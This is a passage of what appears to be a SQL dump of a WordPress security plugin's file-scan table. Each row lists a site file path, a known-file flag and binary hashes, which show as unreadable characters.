�e�','wp-includes/wp-db.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�q�a�f�q@.�R��o','�t\\K�(ɮ�X�\'���[��&��xl���','',0,'?'),('L����E��g���F9','wp-includes/blocks/post-featured-image/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N�vE����S�W�S�>','���8_.�n�\ZE�GO3�Əf���2�2=��E','',0,'?'),('Lͧ������O�n7','wp-includes/wp-includes/js/tinymce/skins/lightgray/content.min.css',0,'���\\PI�ɥ��<\\��','���\\PI�ɥ��<\\��',')�Y@�u&�Kg��\0?���\\F\'�X0�Lj�','',0,'?'),('L�E+���<8^7�EP޳','wp-content/plugins/all-in-one-wp-security-and-firewall/languages/all-in-one-wp-security-and-firewall.pot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�7ރ�礤�>s��','KN�ZE\"*}Ȩ+(K�ɧ;Y\rʙ4<PZ�\0','',0,'?'),('L�\"��v�T�̱L�','wp-includes/blocks/comments-pagination-next/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^�Z7��L�B]','`JCҩ$E�ID8R��ysL�o�ˆl��o�)`f','',0,'?'),('Lւ7z�Z�j�k��Hw','wp-content/plugins/wordpress-seo/src/deprecated/frontend/schema/class-schema-breadcrumb.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S��X�����TB�s#�','�E���e�X��+ސ���n2W[��Jvǎ','',0,'?'),('L�\r�%��{��','wp-includes/blocks/social-link/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','bj��?T�5y�)/q�6','�\"\Z��H���h�A�jU���[\'w	G�T�Up','',0,'?'),('L�RzH;�{=$5�','wp-content/plugins/wordpress-seo/src/services/health-check/postname-permalink-runner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E̸�Ӫ�G��ѿ��r�','�|��nR�n^_�͝c`���5�Z>��=�!�','',0,'?'),('L+q�V�;�h��Y�','wp-includes/fonts/dashicons.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M���N:��\'�ʤ��ȹ','J��!�����XLl`�e��O��s�H����','',0,'?'),('L�>t���N�����','wp-admin/css/colors/blue/colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Z��b���	','C׶��x��T��Z�)\r~\\��Z\\%(��Z֋','',0,'?'),('L�֞+P�C��)~u�_','wp-content/plugins/wordpress-seo/admin/views/partial-notifications-errors.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2K�AX�1�z��','��\\�[� e�_�]vT�Sʑж\\�H\r[','',0,'?'),('L��)��a$�D-�Ӯ�J','wp-includes/js/tinymce/plugins/wplink/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��X��<��ɔ��Ňr','\\�p^W�{�T�wJ�w��Ɏ��.H/�','',0,'?'),('MR8⬻�,�ͽ�=�S','wp-includes/wp-includes/js/jquery/ui/autocomplete.min.js',0,'K�s(.=����ͪ�','K�s(.=����ͪ�','�a�b��u�7���K\'2��V�š�=y��','',0,'?'),('M��\0����@�&��E\\','wp-content/plugins/wp-cerber/assets/flags/kh.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������\"EH��2��+�','őv!f�ķ�yvN��Y��8������}� ','',0,'?'),('M]���}�w��-�!�','wp-content/plugins/wordpress-seo/src/generators/schema/website.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q5I:c��g�\'��9�','���|�mKG�ÕZaV\0f�,~ƻ�u���\rA�','',0,'?'),('Mx1NjTm�R_2o','wp-content/plugins/wordfence/views/dashboard/global-status.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','˫\'�m�`�0>�+#��','���������p������Pv?Z�F��QQcj','',0,'?'),('M1��/�n��̖Q��','wp-includes/css/dist/components/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�O\r4�fA��7>�p','�*\r\\�r݉/H�?k��\\&՝���l�\0��+','',0,'?'),('M?,5�*�����K*�f','wp-admin/js/post.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']�ך��88Հ�O,�','l�a����[X�q�}׳��A�@+��\n���','',0,'?'),('MW�	���:��ي','wp-admin/images/align-none.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�eqd2���u����\r','�g(�1�X�{� [].���T����A��','',0,'?'),('MW��Q��;ci~8�','wp-content/plugins/wordpress-seo/admin/class-yoast-input-validation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��⢥!�\'�*��','u+㷸N�0䭶	�4˒�|G�]��P\ZD`�!�','',0,'?'),('MY��G��\\tX����/','wp-includes/customize/class-wp-customize-color-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&��S?��|��G','h	�3|:Q9z���4Y1[�{^�	$;�#�q��','',0,'?'),('Mj~����?Q���BU','wp-includes/wp-includes/images/uploader-icons-2x.png',0,'���&-��O��Õ�~','���&-��O��Õ�~','���r�\0����\'_>��6��QW��4ڠR��','',0,'?'),('MmQ��%�9k1�!','wp-content/plugins/wordpress-seo/src/surfaces/helpers-surface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S��ӭ����Цu','���t}�d�����l$�N#/�M��Y�ՏPR�','',0,'?'),('Ms_��:p1����K@','wp-content/themes/hitmag/inc/kirki/modules/preset/preset.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��o\\�\0�\\���>Wrڏ',';��{[\'��C[뱳�f7�+!���E�@t*L��','',0,'?'),('Mta{�\0�D��ϪV^�','wp-content/plugins/wordpress-seo/src/deprecated/src/actions/indexation/indexation-action-interface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�U�X�N��','8�?�vjkuJ�T,Ur�A�N¢��<��E�','',0,'?'),('Mv�U�%Lҵ�����m','wp-includes/blocks/navigation/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�uVύ��?[�j','�6vP���<0���0U,k�QaL`�)T�ƅB��','',0,'?'),('M�,�\\!z����|�y','wp-includes/wp-includes/theme-compat/header-embed.php',0,'Omz8��F����','Omz8��F����','�����})d!q	,@,��j��v	����E���','',0,'?'),('M�z���j\"=���T�','wp-includes/wp-includes/customize/class-wp-customize-background-image-setting.php',0,')�@�t��j23��W',')�@�t��j23��W','�4���0^+�u*�:ޓ4q[#��O��m�&�','',0,'?'),('M�p-�E3�jS���','wp-content/themes/hitmag/inc/kirki/modules/webfont-loader/vendor-typekit/src/modules/google/fontapiurlbuilder.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(0����2n�:m�','��dD�ʌ��R�^�}����7@��ٟ','',0,'?'),('M��Pz�Q�Ap�\"�M+','wp-includes/blocks/read-more/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�?���)MS{\"\\��\'','Y�\"���_�^&���G/\Z���2\0�j��@$�','',0,'?'),('M�e\'�T^ouR�q��','wp-content/plugins/wp-cerber/assets/flags/to.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Q�����Y��q�|','���B���\n���;(/�� �})IJWyq�','',0,'?'),('M�ˆE��6Y|�a','wp-content/themes/hitmag/inc/kirki/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�kJx`��B�e�u��','��8c�O:�@|��E�����g6����XO�g-','',0,'?'),('MР\0�A���9Q�+��','wp-includes/js/admin-bar.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a��t�n.�>Ꮃo-l�','��: �=���<\n�؄�ΪO��g�xF�F�@��','',0,'?'),('M�;C�����8Yyﲏ','wp-includes/js/twemoji.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}��p���/	��\0','\Z�˘TwlyF�E�����	���w���P#SN�','',0,'?'),('M�l}�^�Gi��*z','wp-includes/wp-includes/js/jquery/ui/effect-clip.js',0,']02[W�0V1�Q',']02[W�0V1�Q','�|�JR?�]ϭ̺\\T�v���� ��5t����$','',0,'?'),('M���I�M��rD��-','wp-includes/post-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c��֢.�>S%�yn��','ZR�A^2pZ�x��C�|�O+��`n:@��','',0,'?'),('N\n����s���}��','wp-content/plugins/wordpress-seo/src/integrations/uninstall-integration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r���R��\Z�mG�\'','�~�nr<R�3�>�=`�����޿�W��','',0,'?'),('N֫&��\nɥY:��Z','wp-content/themes/hitmag/inc/kirki/modules/webfont-loader/vendor-typekit/src/core/fontmodule.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���J9�݈a�Dh�','�ԣ�fҵ�o$f�+�<nPe\n��p+E�ՇZ','',0,'?'),('N!���,/� ��Y�','wp-content/plugins/wordpress-seo/src/services/health-check/report-builder.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*0�{l7��m\nz��','Q?, y�^I���C� %Ws\n��^�nO�g���','',0,'?'),('N#�T��\'}]yu&�','wp-content/plugins/wp-smushit/app/assets/images/smush-config-icon@2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')�ġ��jĔ�ze m',')&$��(a56T� 1���k��~U��3ܐ','',0,'?'),('N7�A�\0�nnV�֑�','wp-content/plugins/wordfence/images/checkbox.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"��G\r�6|􈘀\'','��y~`w(j�~�=뤼&��ݴ���Q>`^�x','',0,'?'),('N=�f�>$K���H�T�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����?�G{�����g','ĀР<W�;-\Z񀍙��(C+�,M���U��W6','',0,'?'),('Ni�~	�`���W�E','wp-content/plugins/wordfence/lib/wfAlerts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K�(A��|�ϯy��L','�\'_�;?�|US5d}K/+,I!|��t','',0,'?'),('Nxa�߭�̿��(r�_','wp-content/plugins/all-in-one-wp-security-and-firewall/backups/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0��	��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('N|�‡Jв�zn�sw','wp-includes/pluggable-deprecated.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@���\"�j��2�ߖ','��U����=����co��=t1�-\\�\r�=','',0,'?'),('N����4Y���y�߷','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/af.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+����j5�S�@��','���q9���bHy��q�\\��|���I�1�','',0,'?'),('N�3�j@pu5����^��','wp-includes/js/tinymce/skins/wordpress/images/more.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����\n�\nm\0;�˫�z','$��v��o^���U� �A\0���:�\\C�u��','',0,'?'),('N��J�W~��\',Y|�','wp-content/plugins/wp-smushit/app/pages/class-integrations.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��̢�\n�\0%ؼ�}�','�<�2!4�\r,q��0nJ3���k�d~�9�.','',0,'?'),('N�zg��5�tvAEn�','wp-content/themes/hitmag/inc/kirki/upgrade-notifications.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��/zٽDZ���z�','c!T����8�/���$�5�S�H�[���','',0,'?'),('N�� �й���	0��','wp-content/plugins/wp-fastest-cache/js/cdn/cdn.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$�sz�b\\��•@','���FM��}ҋ?	�0o��;��K+���9*5�','',0,'?'),('N�E\\���|���J�S�','wp-content/plugins/wordpress-seo/vendor/composer/autoload_real.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���1#�6	E$�t+/�','��>���l�4��B�ne�L����5F���qAj�','',0,'?'),('N���lvT܆���EX�','wp-content/plugins/wordpress-seo/src/integrations/admin/social-templates-integration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���#�	�M��{bA�C','�W���r�KH�X������ڀy�e�L�','',0,'?'),('N����7�-��_','wp-includes/wp-includes/class-wp-customize-nav-menus.php',0,'B�8û�Td�h9�\Z','B�8û�Td�h9�\Z','��g�n\\�y|�TR�xF����\\��A��&7֏�d','',0,'?'),('N��HV����}�4G','wp-admin/css/customize-widgets-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Eq�_����U�R','��Q.$�J���%b����&M1a�L�W�mF`','',0,'?'),('N�UBy�a�� ��','wp-includes/blocks/columns/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N��}\"2���:(Y�','$�O�L�hF�r��4w��b!�e��|O�0_9�','',0,'?'),('O*�]�����m�ռ','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/guzzle/src/Exception/RequestException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��v���\"�`����W�o','�����|�y��-mp	�ͥ��%t�$���','',0,'?'),('O	��S����#�Yi�v','wp-admin/includes/class-wp-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B�=�g��^h��`�','�>�g��s툋�ݷh\\��O��B-J.���4','',0,'?'),('O�z��̟p*�\0','wp-includes/wp-includes/class-wp-block.php',0,'�ݕ��Fԯ�8f�6��','�ݕ��Fԯ�8f�6��','�����y{���tl+RJ���N��\nj�R','',0,'?'),('O�ҽPT�^�4~��B','wp-includes/css/dist/editor/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���[´�CZ�:�=��','qi�xV�44H_��Y�F$��4�\Z��0��:e','',0,'?'),('O =(�:��<�	�1F�','wp-includes/class-wp-feed-cache-transient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','WY�pm�o��7���','��pGx����!���6�Qlg�7`\'0�','',0,'?'),('O\"��l�!n�M_��','wp-content/plugins/wordpress-seo/admin/metabox/class-metabox-section-react.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ւn4�HG�D�l�had','=Z��W�������$��3%�ϺOh��2�t�u*','',0,'?'),('O+���[�IB���m�m\'','wp-content/plugins/wordfence/images/wf-central-logo.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q�(��VѤ���','\0{\r�ߘ�J/� �^�+��,��S������','',0,'?'),('O/�s䣗�{��zZ�_7','wp-includes/wp-includes/js/mediaelement/mejs-controls.svg',0,'�^yq+�S%��y','�^yq+�S%��y','������h���A3L�:��\'1�ꁠ�\\�','',0,'?'),('O0��KQH���a�a��','wp-includes/wp-includes/js/dist/dom-ready.min.js',0,'w�I�k���o���^?\n�','w�I�k���o���^?\n�','��\0.����ɕ�`�	�Ʃ��P���','',0,'?'),('O2ɂH���!֒�[=','wp-includes/blocks/pattern/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ɓ=���o6��|�{�','�嬛{�mH��3F�l^������݆�l��','',0,'?'),('O4�dzWQ�\0��R��','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/dist/random_compat.phar.pubkey.asc',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>Lj���\"C�ix���','��x眪!����}�\Z�����W����d','',0,'?'),('O4��w��!�������g','wp-content/themes/hitmag/js/html5shiv.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@�D\r)��7c���O','�(��B5s�TP���<pt%�FI4�L�RZ_��Y','',0,'?'),('O=om��,��a�@','wp-includes/wp-includes/css/media-views-rtl.css',0,'~��M]�1f�D,��>�','~��M]�1f�D,��>�','�mA �7N�/z}��;��e��r�cs�#sW','',0,'?'),('O=��h�\0}O��rL�b','wp-content/plugins/wordfence/vendor/composer/ca-bundle/src/CaBundle.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z�U��~�L5�@\ZVU','/�r��T�rm����G�с�\r�%�e\r��|�[','',0,'?'),('O@�[[���J\Z�N','wp-content/plugins/wordpress-seo/src/conditionals/should-index-links-conditional.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���D��}��\"','�3�r�i�پ�I|]m5x��\\���$€~��Qt','',0,'?'),('OS�Y�Wz!8�ʣj�','wp-content/plugins/wordfence/views/gdpr/banner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>6�9!�G��z�>�S','�Z��Q�a̿�|꣞`!�C��2C�K�%#�l�','',0,'?'),('OT���;�h�FR|�','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-maintenance-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9���?�}��e��}�l','c�����);���A��Q��D<�@�<�� G�','',0,'?'),('Oj�sO�*B.�s���','wp-content/plugins/wordpress-seo/src/helpers/request-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��$ʼaJl,�y�','���JoI�vl��ư�z\n(�Yn���!�#','',0,'?'),('OlqCcێ���������','wp-admin/css/forms-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�VV{�oI�+I*�A�','��B\0�4&�K��_\0�r�;���0(��>#�k�','',0,'?'),('Op�&`O����v���L','wp-content/plugins/wp-smushit/app/pages/class-lazy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l���E8Ob���D�7','\0��^rD��b�bw�g6)Z�\r	����z5�','',0,'?'),('Otþ�|���!a��]','wp-includes/blocks/code/theme-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y��\r�=�ɓ�mj��','\Z�IRl�d���;�G:�k2o$���P蔜�','',0,'?'),('Oy�}Ma���_��I','wp-includes/Requests/Exception/HTTP/504.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A����� wj�љ�9�','�<����!B�|$k���݈�# �e�i%0','',0,'?'),('O�潼m$��݋&_','wp-content/plugins/wordfence/modules/login-security/views/manage/deactivate.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��^�F��\n�D��ҭ�','2\"�ޡ�4e���Kӗ�p!w#�����1���,','',0,'?'),('O�T��vyCˊX^��b','wp-includes/wp-includes/js/mce-view.js',0,'2s�H��ّ;[���	s','2s�H��ّ;[���	s','��8`9ڰn�-.�	H�Dp��k+�γ��bI','',0,'?'),('O��\\���P5��{�R�','wp-admin/plugins.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yqaTo<z�N\0\r��y�B','&�e�~@7��H�a�}~��^�,��Zg�� ','',0,'?'),('O�������a�+���','wp-content/plugins/wordpress-seo/admin/views/tool-import-export.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��M��=��۶L\r\Z�','I���Gt�W�O�QWTQ�~]O�SEzS_+��=�','',0,'?'),('O����&�r�蓏�� ','wp-admin/freedoms.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','op�#�h]0:5Y�% �','�/[[j�6�5�uOR�:z�=w�^�1Ir^�>0�','',0,'?'),('O����R�r����D�?�','wp-admin/js/postbox.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^��V2�W?*��]\0��','Ѧ9O�*\Z�vuJT���6���~Aj�|�T','',0,'?'),('O��<���z^!Fc�','wp-content/plugins/wordpress-seo/src/deprecated/frontend/schema/class-schema-author.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':��׳Y�1�UQT&v','��-�����\\J���g�P���5','',0,'?'),('O��?�s�\ZK��?�','wp-content/plugins/wordpress-seo/admin/filters/class-cornerstone-filter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m7cڴd]N��CW��X','Vl�R�y�5�ɏ���}\'�5\Zۼ�%*�Q','',0,'?'),('O�&\0K�n�mo���O','wp-includes/wp-includes/js/tinymce/plugins/directionality/plugin.min.js',0,'�Er�HD��D��3��@','�Er�HD��D��3��@','<����o�@�:����-�Eg���)6^Ѽ\'��','',0,'?'),('O����y ��k	b�','wp-admin/css/customize-nav-menus-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J��v��~����','��S���m��V,�H�Y	�7.J�]!�Y�','',0,'?'),('O�����HI!K!0[�','wp-content/plugins/wordfence/lib/menu_scanner_options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/�����D�X�;�I','���C�&YB�p_d$�,+������Ŝ���J��','',0,'?'),('O�5e���;hz�w@�W','wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader/Metadata.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z<����{~G�f(','��,ב[\Z���@�+���?x���P��А�','',0,'?'),('O��O�M_K7�n��','wp-includes/sitemaps/providers/class-wp-sitemaps-posts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�>o����&��:�`�','j5�Y�N�&�b���\"�2����Fcb$��E��\rlr','',0,'?'),('O�hu�G���&\0�L�','wp-includes/Text/Diff/Engine/native.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S���\r��$�T','S��\04�v@�ű`�DG V�u�e�R��B竇3�','',0,'?'),('P��H��Z`�=���','wp-includes/blocks/pullquote/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�DV�G;�x*��2��(','���&�ɔ��Ģψ���A��v�N��fOM�Q�e','',0,'?'),('P�bw�=����i��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/P2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\\Z��Iw5AlLۢ�','��K{�8��fl��7s�Rh���嗋��I','',0,'?'),('P	�l���ߓ��R�Y','wp-includes/wp-includes/js/jquery/ui/sortable.min.js',0,'M��:�7)�r�ӈ�k','M��:�7)�r�ӈ�k',')��jjc�D�߰�%^B���� �&�ٶ�Ƀ�','',0,'?'),('P�/:��̮�҉���H','wp-content/plugins/wordfence/waf/pomo/streams.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�З:4�z��M�E�7�','�!8�s���w�#�)��\r�<�r|2y*LS^','',0,'?'),('P\r�;V������mV�/6','wp-content/plugins/wordfence/css/license/free.1647958122.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�g����)�#Ds','����!5���,����Ώ;f�E�@�','',0,'?'),('PE۫�7r|oI�6��>','wp-includes/js/backbone.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9FHmRK�)�W/\'>�','@�t�i��z�^e)�ʽ��}N-C?�o<���','',0,'?'),('P ���NtD�݌�n\"�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Fe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a��!�,��^�q�','X߇p�Ք�Z��Љ�ֱo�\r�=˸<!�~�3�','',0,'?'),('P&_#�\'�zT���s','wp-includes/Requests/Exception/HTTP/417.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','oP�%~�75jN��}a�','���L�T��Ҙ$xDs�^�h_!kC�\"1\'��_�','',0,'?'),('P\'�(���?+�z��$�','wp-admin/js/postbox.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"$;�9H�S_��7���','��`���R���f!Rd�<����Q�� ��GIJ','',0,'?'),('P-k\n�FJ�7+�yP�','wp-content/themes/twentytwentythree/templates/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&��7{\r@��!عl\"','_lL!���)�N6��;�!�Y��1�d�脓�c','',0,'?'),('P6��u��[tvJ�Y','wp-includes/wp-includes/js/customize-views.min.js',0,'�Hӷ�-\\Me���','�Hӷ�-\\Me���','�b����L��-���9wlo��y�$+�Y\Zޘ�N','',0,'?'),('P73o�	��\0�=��','wp-admin/js/word-count.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\rffB)��������','��6j�,A�ުǭs�D��eC�z�&���\n���','',0,'?'),('PJ�~]��; ��`y','wp-includes/widgets/class-wp-widget-media-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�F�{����f���&\Z','��!�/�\0�u8p�aVs�}`�o+[?hu �x�','',0,'?'),('PK��2�I��)��','wp-content/plugins/wordfence/crypto/vendor/composer/autoload_static.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3[�h�k�da4�p','�&�!�7^�@��9���N�BT�����*8�','',0,'?'),('PL��F^�9�R�6z�p','wp-includes/blocks/navigation-submenu/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��%vgi}��C��n\\','�Ey\"N)�$�����ŏ�ue�A��\0�G�','',0,'?'),('PXGß5QKїf�W�fZ','wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/selectWoo.full.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n�]�7��;2���})','���G�.�?=�VX!�>����6�Qee\\��','',0,'?'),('P�&x-\nR��_á','wp-content/plugins/wp-smushit/app/assets/css/smush-global.min.css.map',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��)�� ��ixX[m','�Tl0Bљ\'�(��`���C�V�k�����','',0,'?'),('P��[�D�XP��a���','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Subdivision.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���;u‰�S���l','�M>:\r�&�V��`�\Z:�O0�Sv;\0��V�w','',0,'?'),('P��iz�t�a�}�a','wp-admin/users.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x_��h��0�SU�뚁','=�d�BHX;���[�\'������a����','',0,'?'),('P�e��\Z��m��vv�','wp-content/themes/hitmag/inc/kirki/controls/php/class-kirki-control-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�O�G�Z���ʓ=�*j','9a�C%߾��w]>lf�IP�ճ����,��9@','',0,'?'),('P��h���~��P�','wp-includes/blocks/page-list/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��%YR�\0�ac�!�=','�*�?u�SN��o���#�d+Ā���0','',0,'?'),('P�~l�]h|�:��an�','wp-content/themes/hitmag/css/editor-blocks.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L��@��qy��-�׍','�Mo���-F02tl�!ٸ�O7<��H*K�','',0,'?'),('P�-�)\041��]���','wp-includes/wp-includes/js/dist/i18n.min.js',0,'pMp�s�Rӷ_�_','pMp�s�Rӷ_�_','+��d8/�]��jB���2?��q�����N','',0,'?'),('P��\n�e���u�\"�','wp-includes/sodium_compat/lib/php72compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Cz�����x�t','����-��F��Կ<�>{�ZA2\"̝��MNq�','',0,'?'),('P���.+���zS�C','wp-content/themes/hitmag/inc/kirki/modules/post-meta/class-kirki-modules-post-meta.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4������ᮚ,E���3','W�;�U�y��LVs!3�ێ�1�gy��)��\0','',0,'?'),('Pè�&R�{(6�M�]8','wp-content/plugins/wordpress-seo/admin/views/tabs/dashboard/dashboard.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^J̧�f<�4����','���V�]m�1�3Y������1���_��`��|','',0,'?'),('P�@���;b<\n�c�','wp-includes/class-wp-oembed-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e��\n��y\'�7��','�F�oD3�Dg}���6+��-7IJ�[dD/v�;','',0,'?'),('P�M�\Z�I̸�ݭY`r','wp-content/plugins/wordfence/lib/wfHelperString.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Euƻ\\S w?,�_�L`','��� ��i�Lƛw���6�_���,n�2S��Zh)','',0,'?'),('P��J1h��|���r�','wp-content/plugins/wordpress-seo/inc/class-wpseo-custom-taxonomies.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��4��3����,','U�0`��7(t���Y��s�\\�h�tr(\'ݩ1�','',0,'?'),('P�0{����ֱm#','wp-includes/wp-includes/css/dist/block-directory/style-rtl.min.css',0,'\n��J�cW�&��Y�','\n��J�cW�&��Y�','i�+W�M�E4�\n�#S�-^�?�ݻ��,�9','',0,'?'),('P�1$���\\*�C','wp-admin/images/stars-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��A���#�S�Me.^','[��耿�_(\rh���Y���T��qZ��','',0,'?'),('P��0��a��R�z= 